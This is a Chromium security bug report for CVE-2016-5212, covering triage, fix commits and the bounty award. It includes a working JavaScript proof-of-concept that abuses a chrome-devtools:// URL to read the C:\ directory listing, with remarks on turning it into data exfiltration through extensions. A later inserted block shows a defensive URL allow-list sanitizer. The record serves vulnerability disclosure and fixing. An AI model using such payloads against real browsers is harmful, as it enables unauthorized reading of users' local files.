Issue 653134 Security: chrome-devtools protocol allows to read the content of C:\ drive
Reported by chromium...@gmail.com, Oct 5 2016 (starred by 2 users)
Status: Fixed
Owner:
Closed: Oct 2016
Components:
EstimatedDays: ----
NextAction: ----
OS: All
Pri: 1
Type: Bug-Security
VERSION
Chrome Version: 55.0.2880.4 canary (64-bit)
Operating System: Windows 7

REPRODUCTION CASE
1. Navigate to the link below.
2. As you can see, the page displays the content of the C:\ drive.
 
Attachments:
devtools-link.txt (1.7 KB)
Recording.mp4 (1022 KB)
Components: Platform>DevTools
Summary: Security: chrome-devtools protocol allows to read the content of C:\ drive (was: Security: Devtools allows to read the content of C:\ drive)
The repro calls chrome-devtools://devtools/remote/serve_rev/@199588/devtools.html?eval(attackcode)

where the attack code works out to be:

function f() {
  // Runs inside the DevTools front-end: hook streamWrite to collect the streamed
  // response, ask the embedder to load file:///C:/ as a "network resource", then
  // document.write the directory-listing rows (addRow(...) calls) it returns.
  c = 'd="",' +
      'DevToolsAPI.streamWrite=function(e,o){d+=o},' +
      'DevToolsAPI.sendMessageToEmbedder("loadNetworkResource",["file:///C:/","",0],' +
      'function(e){d.split("\\n").map(function(e){' +
      'e.match(/addRow.*;/)&&document.write(e.match(/addRow.*;/)[0]);})});';
  // Inject the payload as an inline script; "</script>" is split so it survives.
  document.write("<script>window.document.write('<script>'+c+'</scr'+'ipt>');</scr"+"ipt>");
}
// DevToolsHost exists only once the front-end has loaded; reload until it does.
if (typeof DevToolsHost == "undefined") location.reload();
else f();

This would be interesting if the data in question could be leaked (e.g. instead of document.writing it in text, it instead sent it to a remote server via XHR).

Level of exploitability depends on whether or not Chrome is willing to navigate to such a link in markup or as the source of an IFRAME or whether the attacker needs to convince the user to navigate to it via the address bar.
Labels: Security_Severity-Medium Security_Impact-Stable
Owner: dgozman@chromium.org
Status: Assigned
Exfiltration seems likely, which would make this severity high.
But it appears to require navigation [It would be a bug in itself if web content could open devtools schemes], dropping to medium.


FWIW it's possible to navigate to chrome-devtools schemes from extensions. This means an extension with no permissions will be able to read disk contents.
Labels: -Security_Severity-Medium Security_Severity-High OS-All
Labels: M-53 Pri-1
Project Member Comment 6 by sheriffbot@chromium.org, Oct 13 2016
Labels: -M-53 M-54
Any updates on this bug?
Status: Started
The patch is under review.
Project Member Comment 9 by bugdroid1@chromium.org, Oct 17 2016
The following revision refers to this bug:
  https://chromium.googlesource.com/chromium/src.git/+/f865c2dfddb1d95af3a2467587c62566e3f7dfe4

commit f865c2dfddb1d95af3a2467587c62566e3f7dfe4
Author: dgozman <dgozman@chromium.org>
Date: Mon Oct 17 23:35:31 2016

[DevTools] Move sanitize url to devtools_ui.cc.

Compatibility script is not reliable enough.

BUG= 653134 

Review-Url: https://codereview.chromium.org/2403633002
Cr-Commit-Position: refs/heads/master@{#425814}

[modify] https://crrev.com/f865c2dfddb1d95af3a2467587c62566e3f7dfe4/chrome/browser/devtools/devtools_window.cc
[modify] https://crrev.com/f865c2dfddb1d95af3a2467587c62566e3f7dfe4/chrome/browser/ui/webui/devtools_ui.cc
[modify] https://crrev.com/f865c2dfddb1d95af3a2467587c62566e3f7dfe4/chrome/browser/ui/webui/devtools_ui.h
[add] https://crrev.com/f865c2dfddb1d95af3a2467587c62566e3f7dfe4/chrome/browser/ui/webui/devtools_ui_unittest.cc
[modify] https://crrev.com/f865c2dfddb1d95af3a2467587c62566e3f7dfe4/chrome/test/BUILD.gn
[modify] https://crrev.com/f865c2dfddb1d95af3a2467587c62566e3f7dfe4/content/renderer/devtools/devtools_client.cc
[modify] https://crrev.com/f865c2dfddb1d95af3a2467587c62566e3f7dfe4/third_party/WebKit/Source/devtools/front_end/Runtime.js
[modify] https://crrev.com/f865c2dfddb1d95af3a2467587c62566e3f7dfe4/third_party/WebKit/Source/devtools/front_end/devtools.js
[modify] https://crrev.com/f865c2dfddb1d95af3a2467587c62566e3f7dfe4/third_party/WebKit/Source/devtools/front_end/screencast/ScreencastView.js

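The repro earlier in this thread drives the privileged DevTools front-end with an attacker-chosen query string (?eval(attackcode)), and the fix above moves URL sanitization out of the front-end compatibility script into the browser process (devtools_ui.cc). The block below is an added illustration of that design, not Chromium's code and not the logic of commit f865c2df: a browser-side allow-list sanitizer for a DevTools front-end URL that keeps only known query keys with validated values and only pinned front-end paths, so a payload in the query string never reaches the page. The scheme and host are taken from the repro URL; the allowed key names, value formats, path patterns and the sample URLs are assumptions constructed for this example.

```javascript
// Added example (not Chromium's code): browser-side allow-list sanitizer for a
// DevTools front-end URL. Key names, value validators and path patterns below
// are assumptions chosen for this illustration, not Chromium's actual allow-list.
'use strict';

const FRONTEND_SCHEME = 'chrome-devtools:';   // as in the repro URL
const FRONTEND_HOST = 'devtools';             // as in the repro URL

// Assumed: the only query keys the embedder passes through, each with a
// validator for its value. Anything else (e.g. "eval(attackcode)") is dropped.
const ALLOWED_QUERY = {
  ws: v => /^[A-Za-z0-9.\-]+(:\d{1,5})?(\/[A-Za-z0-9._\-\/]*)?$/.test(v), // host[:port][/path]
  dockSide: v => ['bottom', 'right', 'left', 'undocked'].includes(v),
  experiments: v => v === 'true',
  remoteFrontend: v => v === 'true',
};

// Assumed: a remote front-end is only loadable from a pinned revision path,
// a bundled one only from /bundled/<name>.html.
const ALLOWED_PATHS = [
  /^\/remote\/serve_rev\/@[0-9a-f]+\/[A-Za-z0-9_]+\.html$/,
  /^\/bundled\/[A-Za-z0-9_]+\.html$/,
];

function isAllowedPair(key, value) {
  return Object.prototype.hasOwnProperty.call(ALLOWED_QUERY, key) && ALLOWED_QUERY[key](value);
}

// Returns the sanitized URL string, or null if the URL must not be loaded at all.
function sanitizeFrontendURL(raw) {
  let url;
  try {
    url = new URL(raw);              // WHATWG parser also collapses "." and ".." segments
  } catch (e) {
    return null;                     // unparseable: refuse rather than guess
  }
  if (url.protocol !== FRONTEND_SCHEME || url.host !== FRONTEND_HOST) return null;
  if (!ALLOWED_PATHS.some(re => re.test(url.pathname))) return null;

  // Rebuild the query from scratch instead of stripping known-bad substrings:
  // only allow-listed keys whose values pass their validator survive.
  const clean = new URLSearchParams();
  for (const [key, value] of url.searchParams) {
    if (isAllowedPair(key, value)) clean.append(key, value);
  }
  const query = clean.toString();
  // The fragment is discarded as well; the front-end gets nothing it did not ask for.
  return `${url.protocol}//${url.host}${url.pathname}${query ? '?' + query : ''}`;
}

// Query keys that were present but dropped, useful for logging a blocked attempt.
function droppedQueryKeys(raw) {
  let url;
  try { url = new URL(raw); } catch (e) { return []; }
  return [...url.searchParams.keys()].filter(k => !isAllowedPair(k, url.searchParams.get(k)));
}

// Constructed inputs: the URL from the repro and a benign embedder-built URL.
const REPRO_URL = 'chrome-devtools://devtools/remote/serve_rev/@199588/devtools.html?eval(attackcode)';
const BENIGN_URL = 'chrome-devtools://devtools/bundled/inspector.html?ws=localhost:9222/devtools/page/1&dockSide=bottom';

console.log(sanitizeFrontendURL(REPRO_URL));   // query stripped entirely
console.log(droppedQueryKeys(REPRO_URL));      // the eval(...) key was the only one, and it was dropped
console.log(sanitizeFrontendURL(BENIGN_URL));  // both allow-listed keys kept
```

The property that matters is that the output is rebuilt from an allow-list rather than produced by deleting known-bad strings from the input, and that the check runs in the browser process before the front-end page is created; as the commit message notes, doing the same thing in the front-end's own compatibility script was not reliable enough.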

Verified on 56.0.2894.0 (Windows). Fixed.
Labels: M-55 Merge-Request-55
Looks like this didn't introduce regressions in canary for a week. Requesting merge to M55.
Comment 13 by dimu@chromium.org, Oct 24 2016
Labels: -Merge-Request-55 Merge-Approved-55 Hotlist-Merge-Approved
Your change meets the bar and is auto-approved for M55 (branch: 2883)
Project Member Comment 14 by sheriffbot@chromium.org, Oct 25 2016
Status: Fixed
Please mark security bugs as fixed as soon as the fix lands, and before requesting merges. This update is based on the merge- labels applied to this issue. Please reopen if this update was incorrect.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Project Member Comment 15 by bugdroid1@chromium.org, Oct 25 2016
Labels: -merge-approved-55 merge-merged-2883
The following revision refers to this bug:
  https://chromium.googlesource.com/chromium/src.git/+/528c2bce2ece070826a84392d66169ffe33afdcd

commit 528c2bce2ece070826a84392d66169ffe33afdcd
Author: Dmitry Gozman <dgozman@chromium.org>
Date: Tue Oct 25 18:53:53 2016

Merge to 2883 "[DevTools] Move sanitize url to devtools_ui.cc."
> [DevTools] Move sanitize url to devtools_ui.cc.
>
> Compatibility script is not reliable enough.
>
> BUG= 653134 
>
> Review-Url: https://codereview.chromium.org/2403633002
> Cr-Commit-Position: refs/heads/master@{#425814}
(cherry picked from commit f865c2dfddb1d95af3a2467587c62566e3f7dfe4)
TBR=pfeldman

Review URL: https://codereview.chromium.org/2444423002 .

Cr-Commit-Position: refs/branch-heads/2883@{#289}
Cr-Branched-From: 614d31daee2f61b0180df403a8ad43f20b9f6dd7-refs/heads/master@{#423768}

[modify] https://crrev.com/528c2bce2ece070826a84392d66169ffe33afdcd/chrome/browser/devtools/devtools_window.cc
[modify] https://crrev.com/528c2bce2ece070826a84392d66169ffe33afdcd/chrome/browser/ui/webui/devtools_ui.cc
[modify] https://crrev.com/528c2bce2ece070826a84392d66169ffe33afdcd/chrome/browser/ui/webui/devtools_ui.h
[add] https://crrev.com/528c2bce2ece070826a84392d66169ffe33afdcd/chrome/browser/ui/webui/devtools_ui_unittest.cc
[modify] https://crrev.com/528c2bce2ece070826a84392d66169ffe33afdcd/chrome/test/BUILD.gn
[modify] https://crrev.com/528c2bce2ece070826a84392d66169ffe33afdcd/content/renderer/devtools/devtools_client.cc
[modify] https://crrev.com/528c2bce2ece070826a84392d66169ffe33afdcd/third_party/WebKit/Source/devtools/front_end/Runtime.js
[modify] https://crrev.com/528c2bce2ece070826a84392d66169ffe33afdcd/third_party/WebKit/Source/devtools/front_end/devtools.js
[modify] https://crrev.com/528c2bce2ece070826a84392d66169ffe33afdcd/third_party/WebKit/Source/devtools/front_end/screencast/ScreencastView.js

Project Member Comment 16 by sheriffbot@chromium.org, Oct 26 2016
Labels: -Restrict-View-SecurityTeam Restrict-View-SecurityNotify
Labels: reward-topanel
Project Member Comment 18 by bugdroid1@chromium.org, Oct 27 2016
Labels: merge-merged-2840

Labels: -merge-merged-2840
[Automated comment] removing mislabelled merge-merged-2840
Labels: -Hotlist-Merge-Approved
Labels: -reward-topanel reward-unpaid reward-3000
Congratulations, the panel awarded $3,000 for this report!
Labels: -reward-unpaid reward-inprocess
Labels: Release-0-M55
Labels: CVE-2016-5212
Project Member Comment 26 by sheriffbot@chromium.org, Jan 31
Labels: -Restrict-View-SecurityNotify allpublic
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot